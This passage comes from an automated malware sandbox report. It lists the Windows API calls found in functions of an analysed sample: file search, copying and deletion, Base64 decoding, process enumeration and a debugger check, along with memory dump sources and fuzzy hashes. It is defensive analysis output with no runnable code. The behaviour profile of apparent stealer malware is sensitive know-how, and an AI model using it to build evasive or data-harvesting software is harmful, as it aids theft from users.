                                        • Part of subcall function 00300B80: GetSystemTime.KERNEL32(?,02F46C20,003101E9,?,00000000,?,?,?,?,?,002F46E7,?,00000014), ref: 00300BA9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002FA19B
                                        • Part of subcall function 002F6C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,002F1916,?), ref: 002F6C3F
                                        • Part of subcall function 002F6C20: GetFileSizeEx.KERNEL32(00000000,?,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6C55
                                        • Part of subcall function 002F6C20: LocalAlloc.KERNEL32(00000040,?,?,?,002F1916,?), ref: 002F6C70
                                        • Part of subcall function 002F6C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,002F1916,?), ref: 002F6C89
                                        • Part of subcall function 002F6C20: CloseHandle.KERNEL32(00000000,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6CB1
                                      • DeleteFileA.KERNEL32(00000000), ref: 002FA212
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 003042A0: Sleep.KERNEL32(000003E8,?,?,?,?,?), ref: 00304345
                                        • Part of subcall function 003042A0: CreateThread.KERNEL32(00000000,00000000,Function_000130F0,?,00000000,00000000), ref: 0030438D
                                        • Part of subcall function 003042A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00304399
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 002FA250
                                      • FindClose.KERNEL32(00000000), ref: 002FA25F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$lstrcpy$Find$CloseCreatelstrcat$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                      • String ID: \*.*
                                      • API String ID: 4272825625-1173974218
                                      • Opcode ID: 401e63e5d07710ae80aed5af567443f69ceafa607f0553e816a1f563806cb53d
                                      • Instruction ID: ad564693d15026b654fe87c2372bafca1b43b3c7f4e792548800f9f207c9f7d3
                                      • Opcode Fuzzy Hash: 401e63e5d07710ae80aed5af567443f69ceafa607f0553e816a1f563806cb53d
                                      • Instruction Fuzzy Hash: D2E1E37182010CAADB59EBA0DD96EFEF338AF14780F504179F61662191EF706B59CF60
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003134C0,003101E9), ref: 002F9A50
                                      • StrCmpCA.SHLWAPI(?,003101DC), ref: 002F9A6D
                                      • StrCmpCA.SHLWAPI(?,003101D8), ref: 002F9A87
                                      • StrCmpCA.SHLWAPI(?,02F45318,00000000,?,?,?,003101E0,?,?,003101E9), ref: 002F9B03
                                      • StrCmpCA.SHLWAPI(?,02F456C0), ref: 002F9B69
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 002F8DD0: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002F8E75
                                        • Part of subcall function 002F8DD0: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002F8EAA
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 002F9CDF
                                      • FindClose.KERNEL32(00000000), ref: 002F9CEE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$File$Find$Copylstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 1309316030-0
                                      • Opcode ID: 854a3320a4e5a4adab6b727b14a1d331833aff355709b46af5cdae0f82d64a59
                                      • Instruction ID: 32ba7f8249f89e96705dd08a2a90be2b48c24f3ab450df1cd222c70bdd415a05
                                      • Opcode Fuzzy Hash: 854a3320a4e5a4adab6b727b14a1d331833aff355709b46af5cdae0f82d64a59
                                      • Instruction Fuzzy Hash: 22914F7192010CA7CB68FB70DD56AFDB779AF443D0F404639FE0692291EF709A688A91
                                      APIs
                                      • memset.MSVCRT ref: 002F89A9
                                      • lstrlen.KERNEL32(?,00000001,?,00001FA0,00000000,00000000), ref: 002F89C6
                                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 002F89CE
                                      • memcpy.MSVCRT(?,?,?), ref: 002F8A3A
                                      • lstrcat.KERNEL32(003101E9,003101E9), ref: 002F8A6D
                                      • lstrcat.KERNEL32(003101E9,003101E9), ref: 002F8A90
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                      • String ID:
                                      • API String ID: 1498829745-0
                                      • Opcode ID: c6769cc163950f52bdb035c1539e777e8932fdbd3995b7e361c4916787842db4
                                      • Instruction ID: 67f58765266033998684c67df4afa1f582ac169e81693d58dbc6519af94ca44b
                                      • Opcode Fuzzy Hash: c6769cc163950f52bdb035c1539e777e8932fdbd3995b7e361c4916787842db4
                                      • Instruction Fuzzy Hash: 16314876E002096BD7119B58EC85BEEFB7CEF48700F088075F908E2240DBB05B588BE1
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00301329
                                      • Process32First.KERNEL32(00000000,00000128), ref: 00301339
                                      • Process32Next.KERNEL32(00000000,00000128), ref: 0030134B
                                      • StrCmpCA.SHLWAPI(?,?), ref: 00301360
                                      • CloseHandle.KERNEL32(00000000), ref: 00301385
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: 28839f6600a034fe86a9ae264d4a3b415a4d0d68fc6cc5426e5c1aa2bfadc25d
                                      • Instruction ID: e121e283756e79b7170d36d3fe0bdc6ca1478ce9a31bf429f0c0741073b1b681
                                      • Opcode Fuzzy Hash: 28839f6600a034fe86a9ae264d4a3b415a4d0d68fc6cc5426e5c1aa2bfadc25d
                                      • Instruction Fuzzy Hash: 39118175A01218AFDB21DF98DC05BEEB7BCFB49710F0042AAE809E3680D7345A04CBA1
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 0030DB06
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0030DB1B
                                      • UnhandledExceptionFilter.KERNEL32(00315C14), ref: 0030DB26
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0030DB42
                                      • TerminateProcess.KERNEL32(00000000), ref: 0030DB49
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                       • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID:
                                      • API String ID: 2579439406-0
                                      • Opcode ID: 6377c09b24b4f3199c16a2360b241105b81b23dd4cab541d221f37547fadb70c
                                      • Instruction ID: cf1eefe4f733f5b2c83d718f6bdbbfd4d0fa81adb7c171076d40bca637a8c3a7
                                      • Opcode Fuzzy Hash: 6377c09b24b4f3199c16a2360b241105b81b23dd4cab541d221f37547fadb70c
                                      • Instruction Fuzzy Hash: 3A21F478401204CFD725DFA4FC956883FA4BF2E310F10901AE44997273EBB0598AEF95
                                      APIs
                                      • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,00000000,?,?,002F4635,?,?,?,?,?,?), ref: 00300E14
                                      • GetProcessHeap.KERNEL32(00000000,?,?,002F4635,?,?,?,?,?,?), ref: 00300E23
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00300E2A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                       • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateBinaryCryptProcessString
                                      • String ID:
                                      • API String ID: 869800140-0
                                      • Opcode ID: 59bc28a420ba069b120c4a59931be87b78d9317a082b40cc46ac17da234f35cc
                                      • Instruction ID: 4e230a4bf50f0b1af5cc03648bb74aa04285761bc83b26acd34f9cc765679b1b
                                      • Opcode Fuzzy Hash: 59bc28a420ba069b120c4a59931be87b78d9317a082b40cc46ac17da234f35cc
                                      • Instruction Fuzzy Hash: 2B113C71201209ABEB10DFA5EC85EAB77ACFF4A321F10055AFD0897240D771AC51DAA0
                                      APIs
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,002F5AF2,00000000,00000000), ref: 002F6CF7
                                      • LocalAlloc.KERNEL32(00000040,00000000,?,002F5AF2,00000000,?,?), ref: 002F6D06
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,002F5AF2,00000000,00000000), ref: 002F6D1D
                                      • LocalFree.KERNEL32(?,?,002F5AF2,00000000,?,?), ref: 002F6D2C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                       • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptLocalString$AllocFree
                                      • String ID:
                                      • API String ID: 4291131564-0
                                      • Opcode ID: 9886c82fecb9f3125f667299c6ef3e0857c1dfb2ea167e3ec2def90ba2a3b5ac
                                      • Instruction ID: f4f1a2d4255f682daaa1a6e39fdcfa2a7593a782216fbde19863027b82b9324b
                                      • Opcode Fuzzy Hash: 9886c82fecb9f3125f667299c6ef3e0857c1dfb2ea167e3ec2def90ba2a3b5ac
                                      • Instruction Fuzzy Hash: 55012C723403166BF7304F959C46F66B7ACEF55BA1F280425FB48EA2C0D7B1A8118BA4
                                      APIs
                                      • memcpy.MSVCRT(00000000,?,?,?,00000000,?,?,?,0030A775,?,00000000,?,00004000,00000000,00000000,?), ref: 0030A185
                                      • memcpy.MSVCRT(?,?,?,?,00000000,?,?,?,0030A775,?,00000000,?,00004000,00000000,00000000,?), ref: 0030A244
                                      • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,0030A775,?,00000000,?,00004000,00000000), ref: 0030A26A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                       • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
